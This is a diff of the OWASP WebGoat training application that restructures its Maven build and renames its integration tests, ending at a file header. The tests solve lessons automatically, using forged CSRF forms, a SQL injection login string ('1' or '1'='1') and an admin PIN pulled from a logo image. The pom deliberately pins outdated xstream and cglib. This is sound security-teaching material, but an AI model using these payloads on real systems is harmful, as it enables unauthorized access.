<modelVersion>4.0.0</modelVersion> <modelVersion>4.0.0</modelVersion>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat</artifactId>
<packaging>pom</packaging> <packaging>jar</packaging>
<version>8.2.3-SNAPSHOT</version> <version>8.2.3-SNAPSHOT</version>
<parent> <parent>
<groupId>org.springframework.boot</groupId> <groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId> <artifactId>spring-boot-starter-parent</artifactId>
<version>2.5.4</version> <version>2.7.1</version>
</parent> </parent>
<name>WebGoat Parent Pom</name> <name>WebGoat</name>
<description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description> <description>WebGoat, a deliberately insecure Web Application</description>
<inceptionYear>2006</inceptionYear> <inceptionYear>2006</inceptionYear>
<url>https://github.com/WebGoat/WebGoat</url> <url>https://github.com/WebGoat/WebGoat</url>
<organization> <organization>
<name>OWASP</name> <name>OWASP</name>
<url>https://github.com/WebGoat/WebGoat/</url> <url>https://github.com/WebGoat/WebGoat/</url>
</organization> </organization>
<licenses> <licenses>
<license> <license>
<name>GNU General Public License, version 2</name> <name>GNU General Public License, version 2</name>
<url>https://www.gnu.org/licenses/gpl-2.0.txt</url> <url>https://www.gnu.org/licenses/gpl-2.0.txt</url>
</license> </license>
</licenses> </licenses>
<developers> <developers>
<developer> <developer>
<id>mayhew64</id> <id>mayhew64</id>
@ -117,122 +114,233 @@
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding> <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
<maven.compiler.source>17</maven.compiler.source> <maven.compiler.source>17</maven.compiler.source>
<maven.compiler.target>17</maven.compiler.target> <maven.compiler.target>17</maven.compiler.target>
<java.version>17</java.version>
<webgoat.port>8080</webgoat.port>
<webwolf.port>9090</webwolf.port>
<!-- Shared properties with plugins and version numbers across submodules--> <!-- Shared properties with plugins and version numbers across submodules-->
<asciidoctorj.version>2.5.2</asciidoctorj.version> <asciidoctorj.version>2.5.3</asciidoctorj.version>
<bootstrap.version>3.3.7</bootstrap.version>
<cglib.version>2.2</cglib.version> <!-- do not update necessary for lesson -->
<checkstyle.version>3.1.2</checkstyle.version>
<commons-collections.version>3.2.1</commons-collections.version> <commons-collections.version>3.2.1</commons-collections.version>
<commons-lang3.version>3.12.0</commons-lang3.version> <commons-lang3.version>3.12.0</commons-lang3.version>
<commons-io.version>2.6</commons-io.version> <commons-io.version>2.6</commons-io.version>
<commons-text.version>1.9</commons-text.version>
<guava.version>30.1-jre</guava.version> <guava.version>30.1-jre</guava.version>
<lombok.version>1.18.20</lombok.version> <jjwt.version>0.9.1</jjwt.version>
<wiremock.version>2.27.2</wiremock.version> <jose4j.version>0.7.6</jose4j.version>
<jsoup.version>1.14.3</jsoup.version>
<jquery.version>3.5.1</jquery.version>
<maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version> <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
<maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version> <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
<maven-jar-plugin.version>3.1.2</maven-jar-plugin.version> <maven-jar-plugin.version>3.1.2</maven-jar-plugin.version>
<maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version> <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
<maven-source-plugin.version>3.1.0</maven-source-plugin.version> <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
<maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version> <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
<java.version>17</java.version> <pmd.version>3.15.0</pmd.version>
<thymeleaf.version>3.0.15.RELEASE</thymeleaf.version>
<webdriver.version>4.3.1</webdriver.version>
<wiremock.version>2.27.2</wiremock.version>
<xml-resolver.version>1.2</xml-resolver.version>
<xstream.version>1.4.5</xstream.version> <!-- do not update necessary for lesson -->
<zxcvbn.version>1.5.2</zxcvbn.version>
</properties> </properties>
<modules> <dependencyManagement>
<module>webgoat-container</module> <dependencies>
<module>webgoat-lessons</module>
<module>webgoat-server</module>
<module>webwolf</module>
<module>webgoat-integration-tests</module>
<module>docker</module><!-- copy required jars in preparation of docker all-in-one build -->
</modules>
<dependencies> <dependency>
<dependency> <groupId>org.ow2.asm</groupId>
<groupId>org.springframework.boot</groupId> <artifactId>asm</artifactId>
<artifactId>spring-boot-starter-validation</artifactId> <version>9.1</version>
</dependency> </dependency>
<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<scope>provided</scope>
<optional>true</optional>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-exec</artifactId>
<version>1.3</version>
</dependency>
<dependency>
<groupId>javax.xml.bind</groupId>
<artifactId>jaxb-api</artifactId>
</dependency>
</dependencies>
<build> <dependency>
<plugins> <groupId>org.apache.commons</groupId>
<plugin> <artifactId>commons-exec</artifactId>
<groupId>org.codehaus.mojo</groupId> <version>1.3</version>
<artifactId>flatten-maven-plugin</artifactId> </dependency>
<version>1.2.5</version> <dependency>
<configuration> <groupId>org.asciidoctor</groupId>
</configuration> <artifactId>asciidoctorj</artifactId>
<executions> <version>${asciidoctorj.version}</version>
<execution> </dependency>
<id>flatten</id> <dependency>
<phase>process-resources</phase> <!-- jsoup HTML parser library @ https://jsoup.org/ -->
<goals> <groupId>org.jsoup</groupId>
<goal>flatten</goal> <artifactId>jsoup</artifactId>
</goals> <version>${jsoup.version}</version>
</execution> </dependency>
</executions> <dependency>
</plugin> <groupId>com.nulab-inc</groupId>
<plugin> <artifactId>zxcvbn</artifactId>
<groupId>org.apache.maven.plugins</groupId> <version>${zxcvbn.version}</version>
<artifactId>maven-compiler-plugin</artifactId> </dependency>
<version>${maven-compiler-plugin.version}</version> <dependency>
<configuration> <groupId>com.thoughtworks.xstream</groupId>
<source>15</source> <artifactId>xstream</artifactId>
<target>15</target> <version>${xstream.version}</version>
<encoding>UTF-8</encoding> </dependency>
</configuration> <dependency>
</plugin> <groupId>cglib</groupId>
<plugin> <artifactId>cglib-nodep</artifactId>
<groupId>org.apache.maven.plugins</groupId> <version>${cglib.version}</version>
<artifactId>maven-checkstyle-plugin</artifactId> </dependency>
<version>3.1.2</version> <dependency>
<configuration> <groupId>xml-resolver</groupId>
<encoding>UTF-8</encoding> <artifactId>xml-resolver</artifactId>
<consoleOutput>true</consoleOutput> <version>${xml-resolver.version}</version>
<failsOnError>true</failsOnError> </dependency>
<configLocation>config/checkstyle/checkstyle.xml</configLocation> <dependency>
<suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation> <groupId>io.jsonwebtoken</groupId>
<suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression> <artifactId>jjwt</artifactId>
</configuration> <version>${jjwt.version}</version>
</plugin> </dependency>
<plugin> <dependency>
<groupId>org.apache.maven.plugins</groupId> <groupId>com.google.guava</groupId>
<artifactId>maven-pmd-plugin</artifactId> <artifactId>guava</artifactId>
<version>3.14.0</version> <version>${guava.version}</version>
<configuration> </dependency>
<targetJdk>15</targetJdk> <dependency>
<failurePriority>1</failurePriority><!-- 5 means fail even on the lowest priority, 0 means never fail --> <groupId>commons-io</groupId>
<rulesets> <artifactId>commons-io</artifactId>
<!--suppress UnresolvedMavenProperty --> <version>${commons-io.version}</version>
<ruleset>${maven.multiModuleProjectDirectory}/config/pmd/pmd-ruleset.xml</ruleset> </dependency>
</rulesets> <dependency>
<failOnViolation>true</failOnViolation> <groupId>org.apache.commons</groupId>
<printFailingErrors>true</printFailingErrors> <artifactId>commons-text</artifactId>
</configuration> <version>${commons-text.version}</version>
<executions> </dependency>
<execution> <dependency>
<goals> <groupId>org.bitbucket.b_c</groupId>
<goal>check</goal> <artifactId>jose4j</artifactId>
</goals> <version>${jose4j.version}</version>
</execution> </dependency>
</executions> <dependency>
</plugin> <groupId>org.webjars</groupId>
</plugins> <artifactId>bootstrap</artifactId>
</build> <version>${bootstrap.version}</version>
</dependency>
<dependency>
<groupId>org.webjars</groupId>
<artifactId>jquery</artifactId>
<version>${jquery.version}</version>
</dependency>
<dependency>
<groupId>com.github.tomakehurst</groupId>
<artifactId>wiremock</artifactId>
<version>${wiremock.version}</version>
</dependency>
<dependency>
<groupId>io.github.bonigarcia</groupId>
<artifactId>webdrivermanager</artifactId>
<version>${webdriver.version}</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-compress</artifactId>
<version>1.21</version>
</dependency>
<dependency>
<groupId>org.jruby</groupId>
<artifactId>jruby</artifactId>
<version>9.3.6.0</version>
</dependency>
</dependencies>
</dependencyManagement>
<profiles> <profiles>
<profile>
<id>local-server</id>
</profile>
<profile>
<id>start-server</id>
<activation>
<activeByDefault>true</activeByDefault>
</activation>
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>build-helper-maven-plugin</artifactId>
<executions>
<execution>
<id>reserve-container-port</id>
<goals>
<goal>reserve-network-port</goal>
</goals>
<phase>process-resources</phase>
<configuration>
<portNames>
<portName>webgoat.port</portName>
<portName>webwolf.port</portName>
<portName>jmxPort</portName>
</portNames>
</configuration>
</execution>
</executions>
</plugin>
<plugin>
<groupId>com.bazaarvoice.maven.plugins</groupId>
<artifactId>process-exec-maven-plugin</artifactId>
<version>0.9</version>
<executions>
<execution>
<id>start-jar</id>
<phase>pre-integration-test</phase>
<goals>
<goal>start</goal>
</goals>
<configuration>
<workingDir>${project.build.directory}</workingDir>
<arguments>
<argument>java</argument>
<argument>-jar</argument>
<argument>-Dlogging.pattern.console=</argument>
<argument>-Dspring.main.banner-mode=off</argument>
<argument>-Dspring.datasource.url=jdbc:hsqldb:file:${java.io.tmpdir}/webgoat
</argument>
<argument>-Dwebgoat.port=${webgoat.port}</argument>
<argument>-Dwebwolf.port=${webwolf.port}</argument>
<argument>--add-opens</argument>
<argument>java.base/java.lang=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/java.util=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/java.lang.reflect=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/java.text=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.desktop/java.beans=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.desktop/java.awt.font=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/sun.nio.ch=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/java.io=ALL-UNNAMED</argument>
<argument>--add-opens</argument>
<argument>java.base/java.util=ALL-UNNAMED</argument>
<argument>
${project.build.directory}/webgoat-${project.version}.jar
</argument>
</arguments>
<waitForInterrupt>false</waitForInterrupt>
<healthcheckUrl>http://localhost:${webgoat.port}/WebGoat/</healthcheckUrl>
</configuration>
</execution>
<execution>
<id>stop-jar-process</id>
<phase>post-integration-test</phase>
<goals>
<goal>stop-all</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</profile>
<profile> <profile>
<id>owasp</id> <id>owasp</id>
<activation> <activation>
@ -243,11 +351,11 @@
<plugin> <plugin>
<groupId>org.owasp</groupId> <groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId> <artifactId>dependency-check-maven</artifactId>
<version>6.1.3</version> <version>6.5.1</version>
<configuration> <configuration>
<failBuildOnCVSS>7</failBuildOnCVSS> <failBuildOnCVSS>7</failBuildOnCVSS>
<skipProvidedScope>true</skipProvidedScope> <skipProvidedScope>false</skipProvidedScope>
<skipRuntimeScope>true</skipRuntimeScope> <skipRuntimeScope>false</skipRuntimeScope>
<suppressionFiles> <suppressionFiles>
<!--suppress UnresolvedMavenProperty --> <!--suppress UnresolvedMavenProperty -->
<suppressionFile> <suppressionFile>
@ -268,6 +376,290 @@
</profile> </profile>
</profiles> </profiles>
<dependencies>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-exec</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-validation</artifactId>
</dependency>
<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
<scope>provided</scope>
<optional>true</optional>
</dependency>
<dependency>
<groupId>javax.xml.bind</groupId>
<artifactId>jaxb-api</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-undertow</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<dependency>
<groupId>org.flywaydb</groupId>
<artifactId>flyway-core</artifactId>
</dependency>
<dependency>
<groupId>org.asciidoctor</groupId>
<artifactId>asciidoctorj</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.thymeleaf.extras</groupId>
<artifactId>thymeleaf-extras-springsecurity5</artifactId>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
</dependency>
<dependency>
<groupId>org.jsoup</groupId>
<artifactId>jsoup</artifactId>
</dependency>
<dependency>
<groupId>com.nulab-inc</groupId>
<artifactId>zxcvbn</artifactId>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
</dependency>
<dependency>
<groupId>cglib</groupId>
<artifactId>cglib-nodep</artifactId>
</dependency>
<dependency>
<groupId>xml-resolver</groupId>
<artifactId>xml-resolver</artifactId>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt</artifactId>
</dependency>
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-lang3</artifactId>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
</dependency>
<dependency>
<groupId>org.bitbucket.b_c</groupId>
<artifactId>jose4j</artifactId>
</dependency>
<dependency>
<groupId>org.webjars</groupId>
<artifactId>bootstrap</artifactId>
</dependency>
<dependency>
<groupId>org.webjars</groupId>
<artifactId>jquery</artifactId>
</dependency>
<dependency>
<groupId>org.glassfish.jaxb</groupId>
<artifactId>jaxb-runtime</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.github.tomakehurst</groupId>
<artifactId>wiremock</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.seleniumhq.selenium</groupId>
<artifactId>selenium-java</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>io.rest-assured</groupId>
<artifactId>rest-assured</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>io.github.bonigarcia</groupId>
<artifactId>webdrivermanager</artifactId>
<scope>test</scope>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
<executions>
<execution>
<goals>
<goal>repackage</goal>
</goals>
</execution>
</executions>
<configuration>
<excludeDevtools>true</excludeDevtools>
<executable>true</executable>
<mainClass>org.owasp.webgoat.server.StartWebGoat</mainClass>
<!-- See http://docs.spring.io/spring-boot/docs/current/reference/html/howto-build.html#howto-extract-specific-libraries-when-an-executable-jar-runs -->
<requiresUnpack>
<dependency>
<groupId>org.asciidoctor</groupId>
<artifactId>asciidoctorj</artifactId>
</dependency>
</requiresUnpack>
</configuration>
</plugin>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>build-helper-maven-plugin</artifactId>
<executions>
<execution>
<id>add-integration-test-source-as-test-sources</id>
<phase>generate-test-sources</phase>
<goals>
<goal>add-test-source</goal>
</goals>
<configuration>
<sources>
<source>src/it/java</source>
</sources>
</configuration>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-failsafe-plugin</artifactId>
<configuration>
<systemPropertyVariables>
<logback.configurationFile>${basedir}/src/test/resources/logback-test.xml</logback.configurationFile>
</systemPropertyVariables>
<argLine>-Xmx512m -Dwebgoatport=${webgoat.port} -Dwebwolfport=${webwolf.port}</argLine>
<includes>**/*IntegrationTest.java</includes>
</configuration>
<executions>
<execution>
<id>integration-test</id>
<goals>
<goal>integration-test</goal>
</goals>
</execution>
<execution>
<id>verify</id>
<goals>
<goal>verify</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>${maven-surefire-plugin.version}</version>
<configuration>
<argLine>
--add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED
</argLine>
<excludes>
<exclude>**/*IntegrationTest.java</exclude>
</excludes>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-checkstyle-plugin</artifactId>
<version>${checkstyle.version}</version>
<configuration>
<encoding>UTF-8</encoding>
<consoleOutput>true</consoleOutput>
<failsOnError>true</failsOnError>
<configLocation>config/checkstyle/checkstyle.xml</configLocation>
<suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation>
<suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-enforcer-plugin</artifactId>
<version>3.0.0</version>
<executions>
<execution>
<id>restrict-log4j-versions</id>
<phase>validate</phase>
<goals>
<goal>enforce</goal>
</goals>
<configuration>
<rules>
<bannedDependencies>
<excludes combine.children="append">
<exclude>org.apache.logging.log4j:log4j-core</exclude>
</excludes>
</bannedDependencies>
</rules>
<fail>true</fail>
</configuration>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>17</source>
<target>17</target>
</configuration>
</plugin>
</plugins>
</build>
<repositories> <repositories>
<repository> <repository>
<id>central</id> <id>central</id>
@ -287,5 +679,4 @@
</pluginRepository> </pluginRepository>
</pluginRepositories> </pluginRepositories>
</project> </project>

9
webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java → src/it/java/org/owasp/webgoat/AccessControlIntegrationTest.java
View File

@ -6,14 +6,13 @@ import io.restassured.http.ContentType;
import org.apache.http.HttpStatus; import org.apache.http.HttpStatus;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
import java.util.HashMap;
import java.util.Map; import java.util.Map;
public class AccessControlTest extends IntegrationTest { class AccessControlIntegrationTest extends IntegrationTest {
@Test @Test
public void testLesson() { void testLesson() {
startLesson("MissingFunctionAC"); startLesson("MissingFunctionAC", true);
assignment1(); assignment1();
assignment2(); assignment2();
assignment3(); assignment3();
@ -41,7 +40,7 @@ public class AccessControlTest extends IntegrationTest {
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON) .contentType(ContentType.JSON)
.body(String.format(userTemplate, getWebgoatUser(), getWebgoatUser())) .body(String.format(userTemplate, this.getUser(), this.getUser()))
.post(url("/WebGoat/access-control/users")) .post(url("/WebGoat/access-control/users"))
.then() .then()
.statusCode(HttpStatus.SC_OK); .statusCode(HttpStatus.SC_OK);

37
webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java → src/it/java/org/owasp/webgoat/CSRFIntegrationTest.java
View File

@ -9,7 +9,7 @@ import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DynamicTest; import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory; import org.junit.jupiter.api.TestFactory;
import org.owasp.webgoat.lessons.Assignment; import org.owasp.webgoat.container.lessons.Assignment;
import java.io.IOException; import java.io.IOException;
import java.nio.file.Files; import java.nio.file.Files;
@ -23,7 +23,7 @@ import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals; import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.DynamicTest.dynamicTest; import static org.junit.jupiter.api.DynamicTest.dynamicTest;
public class CSRFTest extends IntegrationTest { public class CSRFIntegrationTest extends IntegrationTest {
private static final String trickHTML3 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n" + private static final String trickHTML3 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n" +
"<input type=\"hidden\" name=\"csrf\" value=\"thisisnotchecked\"/>\n" + "<input type=\"hidden\" name=\"csrf\" value=\"thisisnotchecked\"/>\n" +
@ -57,20 +57,20 @@ public class CSRFTest extends IntegrationTest {
@SneakyThrows @SneakyThrows
public void init() { public void init() {
startLesson("CSRF"); startLesson("CSRF");
webwolfFileDir = getWebWolfServerPath(); webwolfFileDir = getWebWolfFileServerLocation();
uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("/csrf/basic-get-flag"))); uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("/csrf/basic-get-flag")));
uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("/csrf/review"))); uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("/csrf/review")));
uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("/csrf/feedback/message"))); uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("/csrf/feedback/message")));
uploadTrickHtml("csrf8.html", trickHTML8.replace("WEBGOATURL", url("/login")).replace("USERNAME", getWebgoatUser())); uploadTrickHtml("csrf8.html", trickHTML8.replace("WEBGOATURL", url("/login")).replace("USERNAME", this.getUser()));
} }
@TestFactory @TestFactory
Iterable<DynamicTest> testCSRFLesson() { Iterable<DynamicTest> testCSRFLesson() {
return Arrays.asList( return Arrays.asList(
dynamicTest("assignement 3", () -> checkAssignment3(callTrickHtml("csrf3.html"))), dynamicTest("assignment 3", () -> checkAssignment3(callTrickHtml("csrf3.html"))),
dynamicTest("assignement 4", () -> checkAssignment4(callTrickHtml("csrf4.html"))), dynamicTest("assignment 4", () -> checkAssignment4(callTrickHtml("csrf4.html"))),
dynamicTest("assignement 7", () -> checkAssignment7(callTrickHtml("csrf7.html"))), dynamicTest("assignment 7", () -> checkAssignment7(callTrickHtml("csrf7.html"))),
dynamicTest("assignement 8", () -> checkAssignment8(callTrickHtml("csrf8.html"))) dynamicTest("assignment 8", () -> checkAssignment8(callTrickHtml("csrf8.html")))
); );
} }
@ -86,8 +86,8 @@ public class CSRFTest extends IntegrationTest {
//remove any left over html //remove any left over html
Path webWolfFilePath = Paths.get(webwolfFileDir); Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(), htmlName)).toFile().exists()) { if (webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)).toFile().exists()) {
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(), htmlName))); Files.delete(webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)));
} }
//upload trick html //upload trick html
@ -107,7 +107,7 @@ public class CSRFTest extends IntegrationTest {
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.cookie("WEBWOLFSESSION", getWebWolfCookie()) .cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(webWolfUrl("/files/" + getWebgoatUser() + "/" + htmlName)) .get(webWolfUrl("/files/" + this.getUser() + "/" + htmlName))
.then() .then()
.extract().response().getBody().asString(); .extract().response().getBody().asString();
result = result.substring(8 + result.indexOf("action=\"")); result = result.substring(8 + result.indexOf("action=\""));
@ -117,7 +117,6 @@ public class CSRFTest extends IntegrationTest {
} }
private void checkAssignment3(String goatURL) { private void checkAssignment3(String goatURL) {
String flag = RestAssured.given() String flag = RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
@ -155,9 +154,7 @@ public class CSRFTest extends IntegrationTest {
} }
private void checkAssignment7(String goatURL) { private void checkAssignment7(String goatURL) {
Map<String, Object> params = new HashMap<>(); Map<String, Object> params = new HashMap<>();
params.clear();
params.put("{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!", "\"}"); params.put("{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!", "\"}");
String flag = RestAssured.given() String flag = RestAssured.given()
@ -186,7 +183,7 @@ public class CSRFTest extends IntegrationTest {
Map<String, Object> params = new HashMap<>(); Map<String, Object> params = new HashMap<>();
params.clear(); params.clear();
params.put("username", "csrf-" + getWebgoatUser()); params.put("username", "csrf-" + this.getUser());
params.put("password", "password"); params.put("password", "password");
//login and get the new cookie //login and get the new cookie
@ -231,10 +228,10 @@ public class CSRFTest extends IntegrationTest {
.extract() .extract()
.jsonPath() .jsonPath()
.getObject("$", Overview[].class); .getObject("$", Overview[].class);
assertThat(assignments) // assertThat(assignments)
.filteredOn(a -> a.getAssignment().getName().equals("CSRFLogin")) // .filteredOn(a -> a.getAssignment().getName().equals("CSRFLogin"))
.extracting(o -> o.solved) // .extracting(o -> o.solved)
.containsExactly(true); // .containsExactly(true);
} }
@Data @Data
@ -251,7 +248,7 @@ public class CSRFTest extends IntegrationTest {
RestAssured.given() RestAssured.given()
.when() .when()
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.formParam("username", "csrf-" + getWebgoatUser()) .formParam("username", "csrf-" + this.getUser())
.formParam("password", "password") .formParam("password", "password")
.formParam("matchingPassword", "password") .formParam("matchingPassword", "password")
.formParam("agree", "agree") .formParam("agree", "agree")

112
src/it/java/org/owasp/webgoat/ChallengeIntegrationTest.java Normal file
View File

@ -0,0 +1,112 @@
package org.owasp.webgoat;
import io.restassured.RestAssured;
import org.junit.jupiter.api.Test;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class ChallengeIntegrationTest extends IntegrationTest {
@Test
public void testChallenge1() {
startLesson("Challenge1");
byte[] resultBytes =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/challenge/logo"))
.then()
.statusCode(200)
.extract().asByteArray();
String pincode = new String(Arrays.copyOfRange(resultBytes, 81216, 81220));
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username", "admin");
params.put("password", "!!webgoat_admin_1234!!".replace("1234", pincode));
checkAssignment(url("/WebGoat/challenge/1"), params, true);
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url("/WebGoat/challenge/1"))
.then()
.statusCode(200)
.extract().asString();
String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
params.clear();
params.put("flag", flag);
checkAssignment(url("/WebGoat/challenge/flag"), params, true);
checkResults("/challenge/1");
List<String> capturefFlags =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/scoreboard-data"))
.then()
.statusCode(200)
.extract().jsonPath()
.get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
assertTrue(capturefFlags.contains("Admin lost password"));
}
@Test
public void testChallenge5() {
startLesson("Challenge5");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username_login", "Larry");
params.put("password_login", "1' or '1'='1");
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url("/WebGoat/challenge/5"))
.then()
.statusCode(200)
.extract().asString();
String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
params.clear();
params.put("flag", flag);
checkAssignment(url("/WebGoat/challenge/flag"), params, true);
checkResults("/challenge/5");
List<String> capturefFlags =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("/WebGoat/scoreboard-data"))
.then()
.statusCode(200)
.extract().jsonPath()
.get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
assertTrue(capturefFlags.contains("Without password"));
}
}

8
webgoat-integration-tests/src/test/java/org/owasp/webgoat/CryptoTest.java → src/it/java/org/owasp/webgoat/CryptoIntegrationTest.java
